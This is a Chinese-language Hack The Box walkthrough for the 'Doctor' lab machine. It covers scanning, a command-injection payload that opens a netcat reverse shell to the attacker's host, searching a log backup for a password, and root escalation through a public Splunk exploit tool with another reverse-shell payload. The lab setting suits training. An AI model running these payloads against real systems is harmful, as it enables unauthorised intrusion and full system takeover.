HTB Doctor(Easy)
地址:https://www.hackthebox.eu/home/machines/profile/278
基本信息在进行渗透之前需要将HTB与kali进行连接,建立连接之后才可以进行渗透
一、信息收集
靶机地址为10.10.10.209
使用nmap对靶机进行扫描
nmap -sC -sV -sT -O -A 10.10.10.209
开放了22,80,8089三个端口
8089对应的服务为splunk
二、访问80端口
需要添加一条hosts命令才可以访问其他内容
三、访问doctors.htb
vim hosts
10.10.10.209 doctors.htb
进入页面后尝试万能登陆密码,但是失败了
注册用户进行登录看看是否有可利用的信息,发现可能存在xss漏洞,可以构造xss代码反弹shell
<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>
成功反弹,获取交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
进入home目录查看是否有可利用信息
在shaun目录下发现user.txt尝试查看,但是没有权限被拒绝
通过其他途径进行权限的提升,最终在/var/log/apache2路径下发现backup文件
查看backup是否能够获得有用信息
筛选含有密码的记录
cat backup | grep password
切换shaun用户登录,查看user.txt但是这不是最终要获取的内容
需要提权到root权限才可以获得
四、提权
利用8089对应的服务为splunk进行提权
git clone https://github.com/cnotin/SplunkWhisperer2.git 复制到/htb/doctor文件夹下
cd SplunkWhisperer2/ 进入SplunkWhisperer2文件
cd PySplunkWhisperer2/ 进入PySplunkWhisperer2文件
chmod 777 PySplunkWhisperer2_remote.py 提权
通过github中的使用方法进行操作
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.3 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/bash '10.10.14.3' '8888''
进入root目录获取root.txt